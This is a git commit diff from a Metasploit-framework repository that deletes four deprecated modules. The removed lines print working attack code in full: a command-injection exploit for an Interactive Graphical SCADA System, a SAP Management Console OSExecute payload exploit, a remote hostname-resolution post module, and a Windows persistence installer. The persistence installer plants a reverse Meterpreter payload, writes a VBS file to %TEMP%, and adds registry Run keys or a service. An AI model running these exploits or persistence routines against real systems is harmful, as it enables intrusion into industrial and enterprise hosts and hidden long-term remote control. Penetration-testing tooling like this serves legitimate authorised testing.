Deprecate modules with date 2013-something
These modules had an expiration date of 2013.bug/bundler_fix
parent
a58698c177
commit
89e1bcc0ca
|
@ -1,65 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
require 'msf/core/module/deprecated'
|
|
||||||
include Msf::Module::Deprecated
|
|
||||||
deprecated Date.new(2013, 12, 17), 'exploit/windows/scada/igss_exec_17'
|
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Interactive Graphical SCADA System Remote Command Injection',
|
|
||||||
'Description' => %q{
|
|
||||||
This module abuses a directory traversal flaw in Interactive
|
|
||||||
Graphical SCADA System v9.00. In conjunction with the traversal
|
|
||||||
flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
|
|
||||||
may be able to execute arbitrary system commands.
|
|
||||||
},
|
|
||||||
'Author' => [ 'Luigi Auriemma', 'MC' ],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'CVE', '2011-1566'],
|
|
||||||
[ 'OSVDB', '72349'],
|
|
||||||
[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Mar 21 2011'))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
Opt::RPORT(12397),
|
|
||||||
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
|
|
||||||
connect
|
|
||||||
|
|
||||||
exec = datastore['CMD']
|
|
||||||
|
|
||||||
packet = [0x00000100].pack('V') + [0x00000000].pack('V')
|
|
||||||
packet << [0x00000100].pack('V') + [0x00000017].pack('V')
|
|
||||||
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
|
|
||||||
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
|
|
||||||
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
|
|
||||||
packet << [0x00000000].pack('V')
|
|
||||||
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
|
|
||||||
packet << "windows\\system32\\cmd.exe\" /c #{exec}"
|
|
||||||
packet << "\x00" * (143 + exec.length)
|
|
||||||
|
|
||||||
print_status("Sending command: #{exec}")
|
|
||||||
sock.put(packet)
|
|
||||||
sock.get_once(-1,0.5)
|
|
||||||
disconnect
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,151 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit4 < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
require 'msf/core/module/deprecated'
|
|
||||||
include Msf::Module::Deprecated
|
|
||||||
deprecated Date.new(2013, 12, 1), "exploit/multi/sap/sap_mgmt_con_osexec_payload"
|
|
||||||
|
|
||||||
Rank = ExcellentRanking
|
|
||||||
|
|
||||||
HttpFingerprint = { :pattern => [ /gSOAP\/2.7/ ] }
|
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
|
||||||
include Msf::Exploit::CmdStagerVBS
|
|
||||||
include Msf::Exploit::EXE
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'SAP Management Console OSExecute Payload Execution',
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'Author' => [ 'Chris John Riley' ],
|
|
||||||
'Description' => %q{
|
|
||||||
This module executes an arbitrary payload through the SAP Management Console
|
|
||||||
SOAP Interface. A valid username and password must be provided.
|
|
||||||
},
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
# General
|
|
||||||
[ 'URL', 'http://blog.c22.cc' ]
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
'DefaultOptions' =>
|
|
||||||
{
|
|
||||||
},
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'BadChars' => "\x00\x3a\x3b\x3d\x3c\x3e\x0a\x0d\x22\x26\x27\x2f\x60\xb4",
|
|
||||||
},
|
|
||||||
'Platform' => [ 'win' ],
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[
|
|
||||||
'Windows Universal',
|
|
||||||
{
|
|
||||||
'Arch' => ARCH_X86,
|
|
||||||
'Platform' => 'win'
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DefaultTarget' => 0,
|
|
||||||
'DisclosureDate' => 'Mar 08 2011'
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
Opt::RPORT(50013),
|
|
||||||
OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
|
|
||||||
OptString.new('USERNAME', [true, 'Username to use', '']),
|
|
||||||
OptString.new('PASSWORD', [true, 'Password to use', '']),
|
|
||||||
], self.class)
|
|
||||||
register_advanced_options(
|
|
||||||
[
|
|
||||||
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']),
|
|
||||||
], self.class)
|
|
||||||
register_autofilter_ports([ 50013 ])
|
|
||||||
end
|
|
||||||
|
|
||||||
def autofilter
|
|
||||||
false
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
|
|
||||||
linemax = datastore['PAYLOAD_SPLIT'] # Values over 9000 can cause issues
|
|
||||||
print_status("Using custom payload size of #{linemax}") if linemax != 7500
|
|
||||||
execute_cmdstager({ :delay => 0.35, :linemax => linemax })
|
|
||||||
handler
|
|
||||||
end
|
|
||||||
|
|
||||||
# This is method required for the CmdStager to work...
|
|
||||||
def execute_command(cmd, opts)
|
|
||||||
|
|
||||||
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
|
|
||||||
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
|
|
||||||
xs = 'http://www.w3.org/2001/XMLSchema'
|
|
||||||
sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
|
|
||||||
ns1 = 'ns1:OSExecute'
|
|
||||||
|
|
||||||
cmd_s = cmd.split("&") #Correct issue with multiple commands on a single line
|
|
||||||
if cmd_s.length > 1
|
|
||||||
print_status("Command Stager progress - Split final payload for delivery (#{cmd_s.length} sections)")
|
|
||||||
end
|
|
||||||
|
|
||||||
cmd_s = cmd_s.collect(&:strip)
|
|
||||||
cmd_s.each do |payload|
|
|
||||||
|
|
||||||
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
|
|
||||||
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi + '" xmlns:xs="' + xs + '">' + "\r\n"
|
|
||||||
data << '<SOAP-ENV:Header>' + "\r\n"
|
|
||||||
data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
|
|
||||||
data << '<enableSession>true</enableSession>' + "\r\n"
|
|
||||||
data << '</sapsess:Session>' + "\r\n"
|
|
||||||
data << '</SOAP-ENV:Header>' + "\r\n"
|
|
||||||
data << '<SOAP-ENV:Body>' + "\r\n"
|
|
||||||
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><command>cmd /c ' + payload.strip
|
|
||||||
data << '</command><async>0</async></' + ns1 + '>' + "\r\n"
|
|
||||||
data << '</SOAP-ENV:Body>' + "\r\n"
|
|
||||||
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
|
|
||||||
|
|
||||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
|
||||||
|
|
||||||
begin
|
|
||||||
res = send_request_raw({
|
|
||||||
'uri' => normalize_uri(datastore['URI']),
|
|
||||||
'method' => 'POST',
|
|
||||||
'data' => data,
|
|
||||||
'headers' =>
|
|
||||||
{
|
|
||||||
'Content-Length' => data.length,
|
|
||||||
'SOAPAction' => '""',
|
|
||||||
'Authorization' => 'Basic ' + user_pass,
|
|
||||||
'Content-Type' => 'text/xml; charset=UTF-8',
|
|
||||||
}
|
|
||||||
}, 60)
|
|
||||||
|
|
||||||
if (res and res.code != 500 and res.code != 200)
|
|
||||||
print_error("[SAP] An unknown response was received from the server")
|
|
||||||
abort("Invlaid server response")
|
|
||||||
elsif res and res.code == 500
|
|
||||||
body = res.body
|
|
||||||
if body.match(/Invalid Credentials/i)
|
|
||||||
print_error("[SAP] The Supplied credentials are incorrect")
|
|
||||||
abort("Exploit not complete, check credentials")
|
|
||||||
elsif body.match(/Permission denied/i)
|
|
||||||
print_error("[SAP] The Supplied credentials are valid, but lack OSExecute permissions")
|
|
||||||
fail_with(Failure::NoAccess, "Exploit not complete, check credentials")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
rescue ::Rex::ConnectionError
|
|
||||||
fail_with(Failure::Unreachable, "Could not access SAP service")
|
|
||||||
break
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,69 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
require 'rex'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
|
||||||
|
|
||||||
require 'msf/core/module/deprecated'
|
|
||||||
include Msf::Module::Deprecated
|
|
||||||
deprecated Date.new(2013, 12, 9), 'post/multi/gather/resolve_hosts'
|
|
||||||
|
|
||||||
def initialize(info={})
|
|
||||||
super( update_info( info,
|
|
||||||
'Name' => 'Windows Resolve Hosts',
|
|
||||||
'Description' => %q{
|
|
||||||
Resolves hostnames to either IPv4 or IPv6 addresses from the perspective of the remote host.
|
|
||||||
},
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
|
|
||||||
'Platform' => [ 'win' ],
|
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options([
|
|
||||||
OptString.new('HOSTNAMES', [true, 'Comma seperated list of hostnames to resolve.']),
|
|
||||||
OptEnum.new('AI_FAMILY', [true, 'Address Family', 'IPv4', ['IPv4', 'IPv6'] ])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
hosts = datastore['HOSTNAMES'].split(',')
|
|
||||||
|
|
||||||
if datastore['AI_FAMILY'] == 'IPv4'
|
|
||||||
family = AF_INET
|
|
||||||
else
|
|
||||||
family = AF_INET6
|
|
||||||
end
|
|
||||||
|
|
||||||
# Clear whitespace
|
|
||||||
hosts.collect{|x| x.strip!}
|
|
||||||
|
|
||||||
print_status("Attempting to resolve '#{hosts.join(', ')}' on #{sysinfo['Computer']}") if not sysinfo.nil?
|
|
||||||
|
|
||||||
response = client.net.resolve.resolve_hosts(hosts, family)
|
|
||||||
|
|
||||||
table = Rex::Ui::Text::Table.new(
|
|
||||||
'Indent' => 0,
|
|
||||||
'SortIndex' => -1,
|
|
||||||
'Columns' =>
|
|
||||||
[
|
|
||||||
'Hostname',
|
|
||||||
'IP',
|
|
||||||
]
|
|
||||||
)
|
|
||||||
|
|
||||||
response.each do |result|
|
|
||||||
if result[:ip].nil?
|
|
||||||
table << [result[:hostname], '[Failed To Resolve]']
|
|
||||||
else
|
|
||||||
table << [result[:hostname], result[:ip]]
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
table.print
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,370 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
require 'rex'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
|
||||||
require 'msf/core/module/deprecated'
|
|
||||||
include Msf::Module::Deprecated
|
|
||||||
deprecated Date.new(2013, 11, 12), 'exploit/windows/local/persistence'
|
|
||||||
|
|
||||||
include Msf::Post::File
|
|
||||||
include Msf::Post::Windows::Priv
|
|
||||||
include Msf::Post::Windows::Registry
|
|
||||||
include Msf::Post::Windows::Services
|
|
||||||
|
|
||||||
def initialize(info={})
|
|
||||||
super( update_info( info,
|
|
||||||
'Name' => 'Windows Manage Persistent Payload Installer',
|
|
||||||
'Description' => %q{
|
|
||||||
This Module will create a boot persistent reverse Meterpreter session by
|
|
||||||
installing on the target host the payload as a script that will be executed
|
|
||||||
at user logon or system startup depending on privilege and selected startup
|
|
||||||
method.
|
|
||||||
|
|
||||||
REXE mode will transfer a binary of your choosing to remote host to be
|
|
||||||
used as a payload.
|
|
||||||
},
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'Author' =>
|
|
||||||
[
|
|
||||||
'Carlos Perez <carlos_perez[at]darkoperator.com>',
|
|
||||||
'Merlyn drforbin Cousins <drforbin6[at]gmail.com>'
|
|
||||||
],
|
|
||||||
'Platform' => [ 'win' ],
|
|
||||||
'Actions' => [['TEMPLATE'], ['REXE']],
|
|
||||||
'DefaultAction' => 'TEMPLATE',
|
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptAddress.new('LHOST', [true, 'IP for persistent payload to connect to.']),
|
|
||||||
OptInt.new('LPORT', [true, 'Port for persistent payload to connect to.']),
|
|
||||||
OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
|
|
||||||
OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM','SERVICE']]),
|
|
||||||
OptBool.new('HANDLER', [ false, 'Start a Multi/Handler to Receive the session.', true]),
|
|
||||||
OptString.new('TEMPLATE', [false, 'Alternate template Windows PE File to use.']),
|
|
||||||
OptString.new('REXE',[false, 'The remote executable to use.','']),
|
|
||||||
OptString.new('REXENAME',[false, 'The name to call exe on remote system','']),
|
|
||||||
OptEnum.new('PAYLOAD_TYPE', [true, 'Meterpreter Payload Type.', 'TCP',['TCP','HTTP','HTTPS']])
|
|
||||||
], self.class)
|
|
||||||
|
|
||||||
register_advanced_options(
|
|
||||||
[
|
|
||||||
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",""]),
|
|
||||||
OptString.new('ENCODER', [false, "Encoder name to use for encoding.",]),
|
|
||||||
OptInt.new('ITERATIONS', [false, 'Number of iterations for encoding.']),
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
# Run Method for when run command is issued
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def run
|
|
||||||
print_status("Running module against #{sysinfo['Computer']}")
|
|
||||||
|
|
||||||
# Set vars
|
|
||||||
rexe = datastore['REXE']
|
|
||||||
rexename = datastore['REXENAME']
|
|
||||||
lhost = datastore['LHOST']
|
|
||||||
lport = datastore['LPORT']
|
|
||||||
opts = datastore['OPTIONS']
|
|
||||||
delay = datastore['DELAY']
|
|
||||||
encoder = datastore['ENCODER']
|
|
||||||
iterations = datastore['ITERATIONS']
|
|
||||||
@clean_up_rc = ""
|
|
||||||
host,port = session.session_host, session.session_port
|
|
||||||
payload = "windows/meterpreter/reverse_tcp"
|
|
||||||
|
|
||||||
if datastore['ACTION'] == 'TEMPLATE'
|
|
||||||
# Check that if a template is provided that it actually exists
|
|
||||||
if datastore['TEMPLATE']
|
|
||||||
if not ::File.exists?(datastore['TEMPLATE'])
|
|
||||||
print_error "Template PE File does not exists!"
|
|
||||||
return
|
|
||||||
else
|
|
||||||
template_pe = datastore['TEMPLATE']
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
# Set the proper payload
|
|
||||||
case datastore['PAYLOAD_TYPE']
|
|
||||||
when /TCP/i
|
|
||||||
payload = "windows/meterpreter/reverse_tcp"
|
|
||||||
when /HTTP/i
|
|
||||||
payload = "windows/meterpreter/reverse_http"
|
|
||||||
when /HTTPS/i
|
|
||||||
payload = "windows/meterpreter/reverse_https"
|
|
||||||
end
|
|
||||||
|
|
||||||
# Create payload and script
|
|
||||||
pay = create_payload(payload, lhost, lport, opts = "")
|
|
||||||
raw = pay_gen(pay,encoder, iterations)
|
|
||||||
script = create_script(delay, template_pe, raw)
|
|
||||||
script_on_target = write_script_to_target(script)
|
|
||||||
else
|
|
||||||
if datastore['REXE'].nil? or datastore['REXE'].empty?
|
|
||||||
print_error("Please define REXE")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
if datastore['REXENAME'].nil? or datastore['REXENAME'].empty?
|
|
||||||
print_error("Please define REXENAME")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
if not ::File.exist?(datastore['REXE'])
|
|
||||||
print_error("Rexe file does not exist!")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
raw = create_payload_from_file(rexe)
|
|
||||||
script_on_target = write_exe_to_target(raw,rexename)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
# Start handler if set
|
|
||||||
create_multihand(payload, lhost, lport) if datastore['HANDLER']
|
|
||||||
|
|
||||||
# Initial execution of script
|
|
||||||
target_exec(script_on_target)
|
|
||||||
|
|
||||||
case datastore['STARTUP']
|
|
||||||
when /USER/i
|
|
||||||
write_to_reg("HKCU",script_on_target)
|
|
||||||
when /SYSTEM/i
|
|
||||||
write_to_reg("HKLM",script_on_target)
|
|
||||||
when /SERVICE/i
|
|
||||||
install_as_service(script_on_target)
|
|
||||||
end
|
|
||||||
|
|
||||||
clean_rc = log_file()
|
|
||||||
file_local_write(clean_rc,@clean_up_rc)
|
|
||||||
print_status("Cleanup Meterpreter RC File: #{clean_rc}")
|
|
||||||
|
|
||||||
report_note(:host => host,
|
|
||||||
:type => "host.persistance.cleanup",
|
|
||||||
:data => {
|
|
||||||
:local_id => session.sid,
|
|
||||||
:stype => session.type,
|
|
||||||
:desc => session.info,
|
|
||||||
:platform => session.platform,
|
|
||||||
:via_payload => session.via_payload,
|
|
||||||
:via_exploit => session.via_exploit,
|
|
||||||
:created_at => Time.now.utc,
|
|
||||||
:commands => @clean_up_rc
|
|
||||||
}
|
|
||||||
)
|
|
||||||
end
|
|
||||||
|
|
||||||
# Generate raw payload
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def pay_gen(pay,encoder, iterations)
|
|
||||||
raw = pay.generate
|
|
||||||
if encoder
|
|
||||||
if enc_compat(pay, encoder)
|
|
||||||
print_status("Encoding with #{encoder}")
|
|
||||||
enc = framework.encoders.create(encoder)
|
|
||||||
(1..iterations).each do |i|
|
|
||||||
print_status("\tRunning iteration #{i}")
|
|
||||||
raw = enc.encode(raw, nil, nil, "Windows")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
return raw
|
|
||||||
end
|
|
||||||
|
|
||||||
# Check if encoder specified is in the compatible ones
|
|
||||||
#
|
|
||||||
# Note: This should allow to adapt to new encoders if they appear with out having
|
|
||||||
# to have a static whitelist.
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def enc_compat(payload, encoder)
|
|
||||||
compat = false
|
|
||||||
payload.compatible_encoders.each do |e|
|
|
||||||
if e[0] == encoder.strip
|
|
||||||
compat = true
|
|
||||||
end
|
|
||||||
end
|
|
||||||
return compat
|
|
||||||
end
|
|
||||||
|
|
||||||
# Create a payload given a name, lhost and lport, additional options
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def create_payload(name, lhost, lport, opts = "")
|
|
||||||
|
|
||||||
pay = session.framework.payloads.create(name)
|
|
||||||
pay.datastore['LHOST'] = lhost
|
|
||||||
pay.datastore['LPORT'] = lport
|
|
||||||
if not opts.empty?
|
|
||||||
opts.split(",").each do |o|
|
|
||||||
opt,val = o.split("=", 2)
|
|
||||||
pay.datastore[opt] = val
|
|
||||||
end
|
|
||||||
end
|
|
||||||
# Validate the options for the module
|
|
||||||
pay.options.validate(pay.datastore)
|
|
||||||
return pay
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
# Function for Creating persistent script
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def create_script(delay,altexe,raw)
|
|
||||||
if not altexe.nil?
|
|
||||||
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, raw, {:persist => true, :delay => delay, :template => altexe})
|
|
||||||
else
|
|
||||||
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, raw, {:persist => true, :delay => delay})
|
|
||||||
end
|
|
||||||
print_status("Persistent agent script is #{vbs.length} bytes long")
|
|
||||||
return vbs
|
|
||||||
end
|
|
||||||
|
|
||||||
# Function for creating log folder and returning log path
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def log_file(log_path = nil)
|
|
||||||
#Get hostname
|
|
||||||
host = session.sys.config.sysinfo["Computer"]
|
|
||||||
|
|
||||||
# Create Filename info to be appended to downloaded files
|
|
||||||
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
|
||||||
|
|
||||||
# Create a directory for the logs
|
|
||||||
if log_path
|
|
||||||
logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
|
|
||||||
else
|
|
||||||
logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
|
|
||||||
end
|
|
||||||
|
|
||||||
# Create the log directory
|
|
||||||
::FileUtils.mkdir_p(logs)
|
|
||||||
|
|
||||||
#logfile name
|
|
||||||
logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
|
|
||||||
return logfile
|
|
||||||
end
|
|
||||||
|
|
||||||
# Function for writing script to target host
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def write_script_to_target(vbs)
|
|
||||||
tempdir = session.fs.file.expand_path("%TEMP%")
|
|
||||||
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
|
||||||
fd = session.fs.file.new(tempvbs, "wb")
|
|
||||||
fd.write(vbs)
|
|
||||||
fd.close
|
|
||||||
print_good("Persistent Script written to #{tempvbs}")
|
|
||||||
@clean_up_rc << "rm #{tempvbs}\n"
|
|
||||||
return tempvbs
|
|
||||||
end
|
|
||||||
|
|
||||||
# Method for checking if a listener for a given IP and port is present
|
|
||||||
# will return true if a conflict exists and false if none is found
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def check_for_listner(lhost,lport)
|
|
||||||
conflict = false
|
|
||||||
client.framework.jobs.each do |k,j|
|
|
||||||
if j.name =~ / multi\/handler/
|
|
||||||
current_id = j.jid
|
|
||||||
current_lhost = j.ctx[0].datastore["LHOST"]
|
|
||||||
current_lport = j.ctx[0].datastore["LPORT"]
|
|
||||||
if lhost == current_lhost and lport == current_lport.to_i
|
|
||||||
print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
|
|
||||||
conflict = true
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
return conflict
|
|
||||||
end
|
|
||||||
|
|
||||||
# Starts a multi/handler session
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def create_multihand(payload,lhost,lport)
|
|
||||||
pay = session.framework.payloads.create(payload)
|
|
||||||
pay.datastore['LHOST'] = lhost
|
|
||||||
pay.datastore['LPORT'] = lport
|
|
||||||
print_status("Starting exploit multi handler")
|
|
||||||
if not check_for_listner(lhost,lport)
|
|
||||||
# Set options for module
|
|
||||||
mul = session.framework.exploits.create("multi/handler")
|
|
||||||
mul.share_datastore(pay.datastore)
|
|
||||||
mul.datastore['WORKSPACE'] = client.workspace
|
|
||||||
mul.datastore['PAYLOAD'] = payload
|
|
||||||
mul.datastore['EXITFUNC'] = 'thread'
|
|
||||||
mul.datastore['ExitOnSession'] = false
|
|
||||||
# Validate module options
|
|
||||||
mul.options.validate(mul.datastore)
|
|
||||||
# Execute showing output
|
|
||||||
mul.exploit_simple(
|
|
||||||
'Payload' => mul.datastore['PAYLOAD'],
|
|
||||||
'LocalInput' => self.user_input,
|
|
||||||
'LocalOutput' => self.user_output,
|
|
||||||
'RunAsJob' => true
|
|
||||||
)
|
|
||||||
else
|
|
||||||
print_error("Could not start handler!")
|
|
||||||
print_error("A job is listening on the same Port")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
# Function to execute script on target and return the PID of the process
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def target_exec(script_on_target)
|
|
||||||
print_status("Executing script #{script_on_target}")
|
|
||||||
proc = datastore['ACTION'] == 'REXE' ? session.sys.process.execute(script_on_target, nil, {'Hidden' => true})\
|
|
||||||
: session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
|
|
||||||
|
|
||||||
print_good("Agent executed with PID #{proc.pid}")
|
|
||||||
@clean_up_rc << "kill #{proc.pid}\n"
|
|
||||||
return proc.pid
|
|
||||||
end
|
|
||||||
|
|
||||||
# Function to install payload in to the registry HKLM or HKCU
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def write_to_reg(key,script_on_target)
|
|
||||||
nam = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
|
|
||||||
if(key)
|
|
||||||
registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
|
|
||||||
print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
|
|
||||||
else
|
|
||||||
print_error("Error: failed to open the registry key for writing")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
# Function to install payload as a service
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def install_as_service(script_on_target)
|
|
||||||
if is_system? or is_admin?
|
|
||||||
print_status("Installing as service..")
|
|
||||||
nam = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
print_status("Creating service #{nam}")
|
|
||||||
datastore['ACTION'] == 'REXE' ? service_create(nam, nam, "cmd /c \"#{script_on_target}\"") : service_create(nam, nam, "cscript \"#{script_on_target}\"")
|
|
||||||
|
|
||||||
@clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n"
|
|
||||||
else
|
|
||||||
print_error("Insufficient privileges to create service")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
# Function for writing executable to target host
|
|
||||||
#-------------------------------------------------------------------------------
|
|
||||||
def write_exe_to_target(vbs,rexename)
|
|
||||||
tempdir = session.fs.file.expand_path("%TEMP%")
|
|
||||||
tempvbs = tempdir + "\\" + rexename
|
|
||||||
fd = session.fs.file.new(tempvbs, "wb")
|
|
||||||
fd.write(vbs)
|
|
||||||
fd.close
|
|
||||||
print_good("Persistent Script written to #{tempvbs}")
|
|
||||||
@clean_up_rc << "rm #{tempvbs}\n"
|
|
||||||
return tempvbs
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_payload_from_file(exec)
|
|
||||||
print_status("Reading Payload from file #{exec}")
|
|
||||||
return ::IO.read(exec)
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
Loading…
Reference in New Issue